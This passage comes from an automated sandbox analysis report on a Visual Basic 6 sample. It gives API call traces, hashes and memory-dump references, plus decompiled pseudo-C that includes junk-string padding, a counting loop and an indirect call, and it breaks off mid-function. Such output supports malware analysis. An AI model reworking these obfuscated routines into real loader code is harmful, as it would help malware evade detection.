      • #592.MSVBVM60(00000002,?,?,?), ref: 0041B52C
      • __vbaFreeVar.MSVBVM60(00000002,?,?,?), ref: 0041B547
      • __vbaVarDup.MSVBVM60(00000002,?,?,?), ref: 0041B585
      • #667.MSVBVM60(00000002,00000002,?,?,?), ref: 0041B591
      • __vbaStrMove.MSVBVM60(00000002,00000002,?,?,?), ref: 0041B59B
      • __vbaFreeVar.MSVBVM60(00000002,00000002,?,?,?), ref: 0041B5A6
      • #670.MSVBVM60(00000002,00000002,?,?,?), ref: 0041B5B9
      • __vbaVarTstEq.MSVBVM60(00008008,00000002,00000002,00000002,?,?,?), ref: 0041B5E0
      • __vbaFreeVar.MSVBVM60(00008008,00000002,00000002,00000002,?,?,?), ref: 0041B5F2
      • __vbaNew2.MSVBVM60(00413B0C,0041D4B0,00008008,00000002,00000002,00000002,?,?,?), ref: 0041B620
      • __vbaHresultCheckObj.MSVBVM60(00000000,00000002,00413AFC,0000001C), ref: 0041B682
      • __vbaChkstk.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00008008,00000002,00000002,00000002), ref: 0041B6B6
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00413BEC,00000060), ref: 0041B701
      • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00008008,00000002), ref: 0041B718
      • __vbaNew2.MSVBVM60(00413B0C,0041D4B0,00008008,00000002,00000002,00000002,?,?,?), ref: 0041B737
      • __vbaHresultCheckObj.MSVBVM60(00000000,00000002,00413AFC,00000014), ref: 0041B799
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00413FD0,00000108), ref: 0041B7F8
      • __vbaFreeObj.MSVBVM60(00000000,?,00413FD0,00000108), ref: 0041B81A
      • _CIcos.MSVBVM60(00000000,?,00413FD0,00000108), ref: 0041B828
      • __vbaFpR8.MSVBVM60(00000000,?,00413FD0,00000108), ref: 0041B82D
      • __vbaNew2.MSVBVM60(00413B0C,0041D4B0), ref: 0041B862
      • __vbaHresultCheckObj.MSVBVM60(00000000,00000002,00413AFC,00000048), ref: 0041B8C6
      • __vbaStrMove.MSVBVM60(00000000,00000002,00413AFC,00000048), ref: 0041B8F0
      • __vbaStrCopy.MSVBVM60(00000000,?,00413AFC,00000048), ref: 0041B90D
      • __vbaStrCopy.MSVBVM60(00000000,?,00413AFC,00000048), ref: 0041B93C
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004120EC,000006F8), ref: 0041B9AB
      • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0041B9D4
      • __vbaStrCopy.MSVBVM60(?,00595B86,20D892D0,00005AFD,00002D3D,bronchoblennorrhea,000026C5,17039750,unappetisingly), ref: 0041BA6A
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004120EC,000006FC,?,00595B86,20D892D0,00005AFD,00002D3D,bronchoblennorrhea,000026C5,17039750,unappetisingly), ref: 0041BAB2
      • __vbaFreeStr.MSVBVM60(00000000,?,004120EC,000006FC,?,00595B86,20D892D0,00005AFD,00002D3D,bronchoblennorrhea,000026C5,17039750,unappetisingly), ref: 0041BAC9
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004120EC,00000700,?,?,DF3437C0), ref: 0041BB41
      • __vbaStrCopy.MSVBVM60(?,?,DF3437C0), ref: 0041BB77
      • __vbaStrCopy.MSVBVM60(?,?,DF3437C0), ref: 0041BB84
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004120EC,00000704,?,?,DF3437C0), ref: 0041BBE0
      • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,DF3437C0), ref: 0041BC07
      • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,?,?,?,?,004013D6), ref: 0041BC18
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004120BC,000001B8), ref: 0041BC5D
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004120BC,000001BC), ref: 0041BCB0
      • __vbaVarMove.MSVBVM60(00000000,?,004120BC,000001BC), ref: 0041BCEC
      • __vbaVarAdd.MSVBVM60(?,00000002,?), ref: 0041BD1E
      • __vbaVarMove.MSVBVM60(?,00000002,?), ref: 0041BD28
      • __vbaVarTstLt.MSVBVM60(00008003,?,?,00000002,?), ref: 0041BD53
      • __vbaVarMove.MSVBVM60(?,00008003,?,?,00000002,?), ref: 0041BD85
      • __vbaFreeStr.MSVBVM60(0041BE12,?,00008003,?,?,00000002,?), ref: 0041BDDD
      • __vbaFreeVar.MSVBVM60(0041BE12,?,00008003,?,?,00000002,?), ref: 0041BDE5
      • __vbaFreeVar.MSVBVM60(0041BE12,?,00008003,?,?,00000002,?), ref: 0041BDED
      • __vbaAryDestruct.MSVBVM60(00000000,?,0041BE12,?,00008003,?,?,00000002,?), ref: 0041BE04
      • __vbaFreeStr.MSVBVM60(00000000,?,0041BE12,?,00008003,?,?,00000002,?), ref: 0041BE0C
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.753142700.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.753129547.0000000000400000.00000002.00020000.sdmp Download File
      • Associated: 00000000.00000002.753201545.000000000041D000.00000004.00020000.sdmp Download File
      • Associated: 00000000.00000002.753211230.000000000041F000.00000002.00020000.sdmp Download File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_PP05492110.jbxd
      Similarity
      • API ID: __vba$Free$CheckHresult$Move$Copy$ChkstkErrorListNew2$BoundsGenerate$#557#592#648#667#670#684#685Construct2DestructIcosSystem
      • String ID: #k$+$2-12$=-$Bldestes2$IKLDENDES$PAKSELET$SITZMARKS$UKRUDTETSBEKMPELSERNE$[n$betises$bronchoblennorrhea$garbling$snuffingly$svastikas$unappetisingly
      • API String ID: 3331697405-633594147
      • Opcode ID: 9be6735f416a2d15d4690791540c710131b0f88925618f1f6733df74cbce9ac0
      • Instruction ID: 1b1042165151e9480b930df9fdb1e44fc6b2072b0ca1044eb0ac9bee7925154c
      • Opcode Fuzzy Hash: 9be6735f416a2d15d4690791540c710131b0f88925618f1f6733df74cbce9ac0
      • Instruction Fuzzy Hash: 99821670900228EFDB20DF51CC45BDDBBB4FB09304F1081EAE549AB1A1DB795A95DF98
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      C-Code - Quality: 65%
      			E0041B84D(intOrPtr* __eax) {
      				signed int _t177;
      				signed int _t188;
      				signed int _t202;
      				signed int _t207;
      				signed int _t215;
      				signed int _t222;
      				signed int _t228;
      				void* _t231;
      				void* _t233;
      				void* _t237;
      				void* _t240;
      				void* _t242;
      				void* _t258;
      				void* _t260;
      				void* _t261;
      				long long* _t262;
      				intOrPtr* _t263;
      
      				 *__eax =  *__eax + __eax;
      				if( *0x41d4b0 != 0) {
      					 *(_t260 - 0x180) = 0x41d4b0;
      				} else {
      					_push(0x41d4b0);
      					_push(0x413b0c);
      					L00401628();
      					 *(_t260 - 0x180) = 0x41d4b0;
      				}
      				 *(_t260 - 0x11c) =  *( *(_t260 - 0x180));
      				_t177 =  *((intOrPtr*)( *( *(_t260 - 0x11c)) + 0x48))( *(_t260 - 0x11c), 0x15, _t260 - 0x78);
      				asm("fclex");
      				 *(_t260 - 0x120) = _t177;
      				if( *(_t260 - 0x120) >= 0) {
      					 *(_t260 - 0x184) =  *(_t260 - 0x184) & 0x00000000;
      				} else {
      					_push(0x48);
      					_push(0x413afc);
      					_push( *(_t260 - 0x11c));
      					_push( *(_t260 - 0x120));
      					L00401622();
      					 *(_t260 - 0x184) = _t177;
      				}
      				 *(_t260 - 0x140) =  *(_t260 - 0x78);
      				 *(_t260 - 0x78) =  *(_t260 - 0x78) & 0x00000000;
      				L0040162E();
      				 *((intOrPtr*)(_t260 - 4)) = 0x1e;
      				 *((short*)(_t260 - 0x104)) = 0xc76;
      				L0040163A();
      				 *((intOrPtr*)(_t260 - 0x110)) =  *0x4013a8;
      				 *((long long*)(_t260 - 0x118)) =  *0x4013a0;
      				 *((intOrPtr*)(_t260 - 0x10c)) = 0x67ab96;
      				_t240 = _t260 - 0x78;
      				L0040163A();
      				_t188 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t260 + 8)))) + 0x6f8))( *((intOrPtr*)(_t260 + 8)), _t260 - 0x78, 0x300b, _t260 - 0x10c, 0x57d5, _t260 - 0x118, 0x3542, _t260 - 0x110, _t260 - 0x7c, _t260 - 0x104, _t260 - 0x108);
      				 *(_t260 - 0x11c) = _t188;
      				if( *(_t260 - 0x11c) >= 0) {
      					 *(_t260 - 0x188) =  *(_t260 - 0x188) & 0x00000000;
      				} else {
      					_push(0x6f8);
      					_push(0x4120ec);
      					_push( *((intOrPtr*)(_t260 + 8)));
      					_push( *(_t260 - 0x11c));
      					L00401622();
      					 *(_t260 - 0x188) = _t188;
      				}
      				 *((short*)(_t260 - 0x50)) =  *((intOrPtr*)(_t260 - 0x108));
      				L00401634();
      				_t262 = _t261 + 0xc;
      				 *((intOrPtr*)(_t260 - 4)) = 0x1f;
      				 *((intOrPtr*)(_t260 - 0x118)) = 0x17039750;
      				 *((intOrPtr*)(_t260 - 0x114)) = 0x5b07;
      				 *((short*)(_t260 - 0x108)) = 0x26c5;
      				 *((short*)(_t260 - 0x104)) = 0x2d3d;
      				 *((intOrPtr*)(_t260 - 0x10c)) = 0x595b86;
      				 *_t262 =  *0x401398;
      				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t260 + 8)))) + 0x70c))( *((intOrPtr*)(_t260 + 8)), _t240, _t260 - 0x10c, 0x20d892d0, 0x5afd, _t260 - 0x104, L"bronchoblennorrhea", _t260 - 0x108, _t260 - 0x118, L"unappetisingly", 2, _t260 - 0x78, _t260 - 0x7c);
      				 *((intOrPtr*)(_t260 - 4)) = 0x20;
      				L0040163A();
      				_t202 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t260 + 8)))) + 0x6fc))( *((intOrPtr*)(_t260 + 8)), 0x662dfd10, 0x5af4, 0xebf5a, _t260 - 0x78);
      				 *(_t260 - 0x11c) = _t202;
      				if( *(_t260 - 0x11c) >= 0) {
      					 *(_t260 - 0x18c) =  *(_t260 - 0x18c) & 0x00000000;
      				} else {
      					_push(0x6fc);
      					_push(0x4120ec);
      					_push( *((intOrPtr*)(_t260 + 8)));
      					_push( *(_t260 - 0x11c));
      					L00401622();
      					 *(_t260 - 0x18c) = _t202;
      				}
      				_t242 = _t260 - 0x78;
      				L0040161C();
      				 *((intOrPtr*)(_t260 - 4)) = 0x21;
      				 *((intOrPtr*)(_t260 - 0x118)) = 0xdf3437c0;
      				 *((intOrPtr*)(_t260 - 0x114)) = 0x5b07;
      				 *((intOrPtr*)(_t260 - 0x10c)) = 0x48ddc3;
      				 *_t262 =  *0x401390;
      				_t207 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t260 + 8)))) + 0x700))( *((intOrPtr*)(_t260 + 8)), _t260 - 0x10c, 0x5391, _t242, _t242, _t260 - 0x118);
      				 *(_t260 - 0x11c) = _t207;
      				if( *(_t260 - 0x11c) >= 0) {
      					 *(_t260 - 0x190) =  *(_t260 - 0x190) & 0x00000000;
      				} else {
      					_push(0x700);
      					_push(0x4120ec);
      					_push( *((intOrPtr*)(_t260 + 8)));
      					_push( *(_t260 - 0x11c));
      					L00401622();
      					 *(_t260 - 0x190) = _t207;
      				}
      				 *((intOrPtr*)(_t260 - 4)) = 0x22;
      				 *((intOrPtr*)(_t260 - 0x10c)) = 0x6ee95b;
      				 *((short*)(_t260 - 0x104)) = 0x163b;
      				L0040163A();
      				L0040163A();
      				_t215 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t260 + 8)))) + 0x704))( *((intOrPtr*)(_t260 + 8)), 0x70d3c6, _t260 - 0x78, _t260 - 0x7c, _t260 - 0x104, 0x3b9b, _t260 - 0x10c, _t260 - 0x110);
      				 *(_t260 - 0x11c) = _t215;
      				if( *(_t260 - 0x11c) >= 0) {
      					 *(_t260 - 0x194) =  *(_t260 - 0x194) & 0x00000000;
      				} else {
      					_push(0x704);
      					_push(0x4120ec);
      					_push( *((intOrPtr*)(_t260 + 8)));
      					_push( *(_t260 - 0x11c));
      					L00401622();
      					 *(_t260 - 0x194) = _t215;
      				}
      				 *((intOrPtr*)(_t260 - 0x4c)) =  *((intOrPtr*)(_t260 - 0x110));
      				L00401634();
      				_t263 = _t262 + 0xc;
      				 *((intOrPtr*)(_t260 - 4)) = 0x23;
      				L00401532();
      				 *((intOrPtr*)(_t260 - 4)) = 0x24;
      				_t222 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t260 + 8)))) + 0x1b8))( *((intOrPtr*)(_t260 + 8)), _t260 - 0x104, 0xffffffff, 2, _t260 - 0x78, _t260 - 0x7c);
      				asm("fclex");
      				 *(_t260 - 0x11c) = _t222;
      				if( *(_t260 - 0x11c) >= 0) {
      					 *(_t260 - 0x198) =  *(_t260 - 0x198) & 0x00000000;
      				} else {
      					_push(0x1b8);
      					_push(0x4120bc);
      					_push( *((intOrPtr*)(_t260 + 8)));
      					_push( *(_t260 - 0x11c));
      					L00401622();
      					 *(_t260 - 0x198) = _t222;
      				}
      				_t228 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t260 + 8)))) + 0x1bc))( *((intOrPtr*)(_t260 + 8)), 0);
      				asm("fclex");
      				 *(_t260 - 0x120) = _t228;
      				if( *(_t260 - 0x120) >= 0) {
      					 *(_t260 - 0x19c) =  *(_t260 - 0x19c) & 0x00000000;
      				} else {
      					_push(0x1bc);
      					_push(0x4120bc);
      					_push( *((intOrPtr*)(_t260 + 8)));
      					_push( *(_t260 - 0x120));
      					L00401622();
      					 *(_t260 - 0x19c) = _t228;
      				}
      				 *((intOrPtr*)(_t260 - 4)) = 0x25;
      				 *(_t260 - 0xc8) =  *(_t260 - 0xc8) & 0x00000000;
      				 *(_t260 - 0xc4) =  *(_t260 - 0xc4) & 0x00000000;
      				 *((intOrPtr*)(_t260 - 0xd0)) = 6;
      				L004015AA();
      				while(1) {
      					 *((intOrPtr*)(_t260 - 4)) = 0x27;
      					 *(_t260 - 0xc8) = 1;
      					 *((intOrPtr*)(_t260 - 0xd0)) = 2;
      					_push(_t260 - 0x44);
      					_push(_t260 - 0xd0);
      					_t231 = _t260 - 0x90;
      					_push(_t231);
      					L0040154A();
      					_t258 = _t231;
      					L004015AA();
      					 *((intOrPtr*)(_t260 - 4)) = 0x28;
      					 *(_t260 - 0xc8) = 0x2ffff;
      					 *((intOrPtr*)(_t260 - 0xd0)) = 0x8003;
      					_push(_t260 - 0x44);
      					_t233 = _t260 - 0xd0;
      					_push(_t233);
      					L00401466();
      					if(_t233 == 0) {
      						break;
      					}
      				}
      				 *((intOrPtr*)(_t260 - 4)) = 0x2b;
      				 *(_t260 - 0xc8) = 0xff8a3387;
      				do {
      					_t258 = _t258 + 1;
      				} while (_t258 != 0xffcbf0f5);
      				 *_t263(_t258 + 0x74a08d);
      				L004015AA();
      				 *((intOrPtr*)(_t260 - 0x10)) = 0;
      				asm("wait");
      				_push(0x41be12);
      				L0040161C();
      				L0040160A();
      				L0040160A();
      				 *((intOrPtr*)(_t260 - 0x10c)) = _t260 - 0x68;
      				_t237 = _t260 - 0x10c;
      				_push(_t237);
      				_push(0);
      				L00401586();
      				L0040161C();
      				return _t237;
      			}




















      0x0041b84d
      0x0041b856
      0x0041b873
      0x0041b858
      0x0041b858
      0x0041b85d
      0x0041b862
      0x0041b867
      0x0041b867
      0x0041b885
      0x0041b89f
      0x0041b8a2
      0x0041b8a4
      0x0041b8b1
      0x0041b8d3
      0x0041b8b3
      0x0041b8b3
      0x0041b8b5
      0x0041b8ba
      0x0041b8c0
      0x0041b8c6
      0x0041b8cb
      0x0041b8cb
      0x0041b8dd
      0x0041b8e3
      0x0041b8f0
      0x0041b8f5
      0x0041b8fc
      0x0041b90d
      0x0041b918
      0x0041b924
      0x0041b92a
      0x0041b939
      0x0041b93c
      0x0041b983
      0x0041b989
      0x0041b996
      0x0041b9b8
      0x0041b998
      0x0041b998
      0x0041b99d
      0x0041b9a2
      0x0041b9a5
      0x0041b9ab
      0x0041b9b0
      0x0041b9b0
      0x0041b9c6
      0x0041b9d4
      0x0041b9d9
      0x0041b9dc
      0x0041b9e3
      0x0041b9ed
      0x0041b9f7
      0x0041ba00
      0x0041ba09
      0x0041ba4a
      0x0041ba55
      0x0041ba5b
      0x0041ba6a
      0x0041ba8a
      0x0041ba90
      0x0041ba9d
      0x0041babf
      0x0041ba9f
      0x0041ba9f
      0x0041baa4
      0x0041baa9
      0x0041baac
      0x0041bab2
      0x0041bab7
      0x0041bab7
      0x0041bac6
      0x0041bac9
      0x0041bace
      0x0041bad5
      0x0041badf
      0x0041bae9
      0x0041bb02
      0x0041bb19
      0x0041bb1f
      0x0041bb2c
      0x0041bb4e
      0x0041bb2e
      0x0041bb2e
      0x0041bb33
      0x0041bb38
      0x0041bb3b
      0x0041bb41
      0x0041bb46
      0x0041bb46
      0x0041bb55
      0x0041bb5c
      0x0041bb66
      0x0041bb77
      0x0041bb84
      0x0041bbb8
      0x0041bbbe
      0x0041bbcb
      0x0041bbed
      0x0041bbcd
      0x0041bbcd
      0x0041bbd2
      0x0041bbd7
      0x0041bbda
      0x0041bbe0
      0x0041bbe5
      0x0041bbe5
      0x0041bbfa
      0x0041bc07
      0x0041bc0c
      0x0041bc0f
      0x0041bc18
      0x0041bc1d
      0x0041bc33
      0x0041bc39
      0x0041bc3b
      0x0041bc48
      0x0041bc6a
      0x0041bc4a
      0x0041bc4a
      0x0041bc4f
      0x0041bc54
      0x0041bc57
      0x0041bc5d
      0x0041bc62
      0x0041bc62
      0x0041bc86
      0x0041bc8c
      0x0041bc8e
      0x0041bc9b
      0x0041bcbd
      0x0041bc9d
      0x0041bc9d
      0x0041bca2
      0x0041bca7
      0x0041bcaa
      0x0041bcb0
      0x0041bcb5
      0x0041bcb5
      0x0041bcc4
      0x0041bccb
      0x0041bcd2
      0x0041bcd9
      0x0041bcec
      0x0041bcf1
      0x0041bcf1
      0x0041bcf8
      0x0041bd02
      0x0041bd0f
      0x0041bd16
      0x0041bd17
      0x0041bd1d
      0x0041bd1e
      0x0041bd23
      0x0041bd28
      0x0041bd2d
      0x0041bd34
      0x0041bd3e
      0x0041bd4b
      0x0041bd4c
      0x0041bd52
      0x0041bd53
      0x0041bd5d
      0x00000000
      0x00000000
      0x0041bd5f
      0x0041bd61
      0x0041bd68
      0x0041bd72
      0x0041bd72
      0x0041bd73
      0x0041bd82
      0x0041bd85
      0x0041bd8a
      0x0041bd91
      0x0041bd92
      0x0041bddd
      0x0041bde5
      0x0041bded
      0x0041bdf5
      0x0041bdfb
      0x0041be01
      0x0041be02
      0x0041be04
      0x0041be0c
      0x0041be11

      APIs
      • __vbaNew2.MSVBVM60(00413B0C,0041D4B0), ref: 0041B862
      • __vbaHresultCheckObj.MSVBVM60(00000000,00000002,00413AFC,00000048), ref: 0041B8C6
      • __vbaStrMove.MSVBVM60(00000000,00000002,00413AFC,00000048), ref: 0041B8F0
      • __vbaStrCopy.MSVBVM60(00000000,?,00413AFC,00000048), ref: 0041B90D
      • __vbaStrCopy.MSVBVM60(00000000,?,00413AFC,00000048), ref: 0041B93C
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004120EC,000006F8), ref: 0041B9AB
      • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0041B9D4
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.753142700.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.753129547.0000000000400000.00000002.00020000.sdmp Download File
      • Associated: 00000000.00000002.753201545.000000000041D000.00000004.00020000.sdmp Download File
      • Associated: 00000000.00000002.753211230.000000000041F000.00000002.00020000.sdmp Download File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_PP05492110.jbxd
      Similarity
      • API ID: __vba$CheckCopyHresult$FreeListMoveNew2
      • String ID: ($=-$PAKSELET$UKRUDTETSBEKMPELSERNE$[n$betises$bronchoblennorrhea$garbling$svastikas$unappetisingly
      • API String ID: 1424178758-1076644587
      • Opcode ID: da8ea276ca34907001cab31adc23db109ab0d7fbea10e84724f2fb01d2779285
      • Instruction ID: df6221da8eff5956beb30dcb1e265897411a0f20adf14dd71ca734c1de55cd48
      • Opcode Fuzzy Hash: da8ea276ca34907001cab31adc23db109ab0d7fbea10e84724f2fb01d2779285
      • Instruction Fuzzy Hash: CED1F47190021CAFDB21DF90CC45BDDBBB8FB08304F1081EAE649AB1A1DB795AC59F94
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 169 40166c-401694 #100 170 4016b6-4016cd 169->170 171 401696 169->171 172 401717-401774 170->172 173 4016cf-401716 170->173 173->172
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.753142700.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.753129547.0000000000400000.00000002.00020000.sdmp Download File
      • Associated: 00000000.00000002.753201545.000000000041D000.00000004.00020000.sdmp Download File
      • Associated: 00000000.00000002.753211230.000000000041F000.00000002.00020000.sdmp Download File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_PP05492110.jbxd
      Similarity
      • API ID: #100
      • String ID: VB5!6&*
      • API String ID: 1341478452-3593831657
      • Opcode ID: 058610d196f2eae6d24382a748fd3b23bef545ae819a9827f513eff93fb452c0
      • Instruction ID: 691868ac2beff0b55e3f8f8de11dd3c10e8c23d854d17ba9c75d70f88f2e855c
      • Opcode Fuzzy Hash: 058610d196f2eae6d24382a748fd3b23bef545ae819a9827f513eff93fb452c0
      • Instruction Fuzzy Hash: D831DB6508E7C04FD30787758C296957FB0AE6361570A86EBC0C2CF4F3D12A484AC736
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 177 4134fc-413503 178 413505 177->178 179 413507-41350c 177->179 178->179 180 413513 179->180 180->180
      Memory Dump Source
      • Source File: 00000000.00000002.753142700.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.753129547.0000000000400000.00000002.00020000.sdmp Download File
      • Associated: 00000000.00000002.753201545.000000000041D000.00000004.00020000.sdmp Download File
      • Associated: 00000000.00000002.753211230.000000000041F000.00000002.00020000.sdmp Download File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_PP05492110.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 7043a6f958f578851074375557521ee8628f97647c5738aa702a4652c11b6c60
      • Instruction ID: 988b12faed8115dc50f829dfdddc2ee0536840b1e38d9458ce2476e935bbf558
      • Opcode Fuzzy Hash: 7043a6f958f578851074375557521ee8628f97647c5738aa702a4652c11b6c60
      • Instruction Fuzzy Hash: 85B01230784005AA56118F648C414AC12C0A2007C63208C33F410D22E0C71DCE40C52F
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 181 4138b0-4138b7 182 4138b9 181->182 183 4138bb-4138c0 181->183 182->183 184 4138c7 183->184 184->184
      Memory Dump Source
      • Source File: 00000000.00000002.753142700.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.753129547.0000000000400000.00000002.00020000.sdmp Download File
      • Associated: 00000000.00000002.753201545.000000000041D000.00000004.00020000.sdmp Download File
      • Associated: 00000000.00000002.753211230.000000000041F000.00000002.00020000.sdmp Download File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_PP05492110.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 7559d6beade1d07112fca81e32e1b0ef7fa80dbb0e21599eaa6b33eb4f89f8b3
      • Instruction ID: 15658ca7f34608f0243322f3c1acad9a3fe40cb959ea5bb7e0200bbb342985d2
      • Opcode Fuzzy Hash: 7559d6beade1d07112fca81e32e1b0ef7fa80dbb0e21599eaa6b33eb4f89f8b3
      • Instruction Fuzzy Hash: 62B01270B94007EA63116B748C025A412D0E24038E3204C33F480E21B0C728DF40C72E
      Uniqueness

      Uniqueness Score: -1.00%

      Non-executed Functions

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 809 40d647-40d654 810 40d682-40d710 809->810 811 40d656-40d67e 809->811 812 40d712-40d73c 810->812 813 40d73e-40d7f8 810->813 811->810 812->813 815 40d827-40d877 813->815 816 40d7fa-40d826 813->816 816->815
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.753142700.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.753129547.0000000000400000.00000002.00020000.sdmp Download File
      • Associated: 00000000.00000002.753201545.000000000041D000.00000004.00020000.sdmp Download File
      • Associated: 00000000.00000002.753211230.000000000041F000.00000002.00020000.sdmp Download File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_PP05492110.jbxd
      Similarity
      • API ID:
      • String ID: (3--
      • API String ID: 0-119145886
      • Opcode ID: 7708b187cd2e56660683e80099f078f0460d0631e9bed43f4c8c730fb01905f1
      • Instruction ID: cb73d2f488ab4c82aee03ad6b6ba108030c05a42812d7c6a26a146a4bf4da6fe
      • Opcode Fuzzy Hash: 7708b187cd2e56660683e80099f078f0460d0631e9bed43f4c8c730fb01905f1
      • Instruction Fuzzy Hash: 2A417C7241E3D18FCB035F74C8A56807FB0EF5B204B1A09DAC4D09F4A7D63A6596CB92
      Uniqueness

      Uniqueness Score: -1.00%

      Memory Dump Source
      • Source File: 00000000.00000002.753142700.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.753129547.0000000000400000.00000002.00020000.sdmp Download File
      • Associated: 00000000.00000002.753201545.000000000041D000.00000004.00020000.sdmp Download File
      • Associated: 00000000.00000002.753211230.000000000041F000.00000002.00020000.sdmp Download File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_PP05492110.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 5a6ae2ac7bfe5d1943c31e2550fb38c89a0a18f164dc575be916512ffe43a99a
      • Instruction ID: b3c9d30d3bcc2dc2054c66f5c3f2906518c83ae4eb7fd4ac63b176f341a846f1
      • Opcode Fuzzy Hash: 5a6ae2ac7bfe5d1943c31e2550fb38c89a0a18f164dc575be916512ffe43a99a
      • Instruction Fuzzy Hash: 1FB01270B840029A97006B788C014E022D092047C63218C33F050C21B0CA28DE4C462E
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 679 41678e-41683b __vbaChkstk #610 __vbaStrVarVal #540 #610 __vbaVarTstNe __vbaFreeStr __vbaFreeVarList 681 416847-416854 __vbaLenBstrB 679->681 682 41683d-416842 #532 679->682 683 416916-4169b5 #610 * 2 __vbaVarAdd #662 __vbaVarTstNe __vbaFreeVarList 681->683 684 41685a-416861 681->684 682->681 685 416ae6-416b85 #702 __vbaStrMove __vbaFreeVar __vbaStrCat #617 __vbaVarTstNe __vbaFreeVarList 683->685 686 4169bb-4169c2 683->686 687 416863-41687c __vbaNew2 684->687 688 41687e 684->688 689 416c96-416d10 __vbaOnError #574 __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCmp __vbaFreeStrList __vbaFreeVar 685->689 690 416b8b-416b92 685->690 691 4169c4-4169dd __vbaNew2 686->691 692 4169df 686->692 693 416888-4168dd __vbaLateMemCallLd __vbaObjVar __vbaObjSetAddref 687->693 688->693 694 416d12-416d8c __vbaVarDup #595 __vbaFreeVarList 689->694 695 416d8f-416d96 689->695 696 416b94-416bad __vbaNew2 690->696 697 416baf 690->697 698 4169e9-416a1b 691->698 692->698 703 4168ff 693->703 704 4168df-4168fd __vbaHresultCheckObj 693->704 694->695 700 416db3 695->700 701 416d98-416db1 __vbaNew2 695->701 702 416bb9-416beb 696->702 697->702 709 416a3d 698->709 710 416a1d-416a3b __vbaHresultCheckObj 698->710 705 416dbd-416def 700->705 701->705 712 416c0d 702->712 713 416bed-416c0b __vbaHresultCheckObj 702->713 707 416906-416911 __vbaFreeObj __vbaFreeVar 703->707 704->707 715 416e11 705->715 716 416df1-416e0f __vbaHresultCheckObj 705->716 707->683 714 416a44-416a99 __vbaChkstk 709->714 710->714 717 416c14-416c65 __vbaChkstk 712->717 713->717 720 416abb 714->720 721 416a9b-416ab9 __vbaHresultCheckObj 714->721 718 416e18-416e48 715->718 716->718 725 416c87 717->725 726 416c67-416c85 __vbaHresultCheckObj 717->726 728 416e4a-416e6b __vbaHresultCheckObj 718->728 729 416e6d 718->729 723 416ac2-416ae1 __vbaObjSet __vbaFreeObj 720->723 721->723 723->685 727 416c8e-416c91 __vbaFreeObj 725->727 726->727 727->689 730 416e74-416f0a __vbaStrMove __vbaFreeObj * 3 __vbaFreeStr * 2 728->730 729->730
      C-Code - Quality: 48%
      			E0041678E(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
      				intOrPtr _v8;
      				intOrPtr _v12;
      				intOrPtr _v16;
      				intOrPtr _v20;
      				char _v32;
      				intOrPtr _v36;
      				void* _v40;
      				short _v44;
      				void* _v48;
      				signed int _v52;
      				char _v56;
      				char _v60;
      				signed int _v64;
      				intOrPtr _v72;
      				char _v80;
      				intOrPtr _v88;
      				char _v96;
      				intOrPtr _v104;
      				char _v112;
      				intOrPtr _v120;
      				char _v128;
      				char* _v152;
      				char _v160;
